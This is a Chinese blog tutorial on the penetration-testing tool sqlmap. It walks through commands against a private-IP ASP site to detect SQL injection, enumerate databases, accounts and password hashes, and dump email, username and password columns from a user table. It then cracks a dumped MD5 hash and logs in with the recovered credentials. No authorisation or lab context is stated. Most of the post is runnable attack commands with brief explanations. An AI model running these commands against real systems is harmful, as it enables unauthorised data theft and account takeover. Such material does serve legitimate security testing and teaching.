渗透测试工具sqlmap怎么用

34次阅读
没有评论

共计 2081 个字符,预计需要花费 6 分钟才能阅读完成。

这篇文章主要介绍渗透测试工具 sqlmap 怎么用,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!

一、检测注入点是否可用

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134

参数:

-u:指定注入点 url

注入结果展示:

(1)注入参数 id 为 GET 注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。

(2)web 服务器系统为 windows 2003 or XP

(3)web 应用程序技术为:ASP.NET, Microsoft IIS 6.0

(4)数据库类型为:SQLSERVER 2000

其中图一有若干询问语句,需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 --batch

二、暴库

一条命令即可曝出该 sqlserver 中所有数据库名称,命令如下:

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 --dbs

参数:

–dbs:dbs 前面有两条杠,请看清楚。

结果显示该 sqlserver 中共包含 7 个可用的数据库。

三、web 当前使用的数据库

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 --current-db

四、web 数据库使用账户

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 --current-user

五、列出 sqlserver 所有用户

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 --users

六、数据库账户与密码

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 --passwords

七、列出数据库中的表

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 -D tourdata --tables

参数:

-D:指定数据库名称

–tables:列出表

结果体现共列出了 34 张表。

八、列出表中字段

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 -D tourdata -T userb --columns

参数:

-D:指定数据库名称

-T:指定要列出字段的表

–columns:指定列出字段

结果显示该 userb 表中包含了 23 条字段。

九、暴字段内容

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 -D tourdata -T userb -C  email,Username,userpassword  --dump

参数:

-C:指定要暴的字段

–dump:将结果导出

如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 -D tourdata -T userb -C  email,Username,userpassword  --start 1 --stop 10 --dump

参数:

–start:指定开始的行

–stop:指定结束的行

此条命令的含义为:导出数据库 tourdata 中的表 userb 中的字段 (email,Username,userpassword) 中的第 1 到第 10 行的数据内容。

渗透测试工具 sqlmap 怎么用

十、验证结果

通过上图结果看到其中的一个用户信息为:

email:123456@qq.com

username: 1.asp

password: 49ba59abbe56e057

通过 md5 解密,得到该 hash 的原文密码为:123456

拿到账号密码我们来测试是否可以登录

渗透测试工具 sqlmap 怎么用

验证成功!

以上是“渗透测试工具 sqlmap 怎么用”这篇文章的所有内容,感谢各位的阅读!希望分享的内容对大家有帮助,更多相关知识,欢迎关注丸趣 TV 行业资讯频道!

正文完
 
丸趣
版权声明:本站原创文章,由 丸趣 2023-07-15发表,共计2081字。
转载说明:除特殊说明外本站除技术相关以外文章皆由网络搜集发布,转载请注明出处。
评论(没有评论)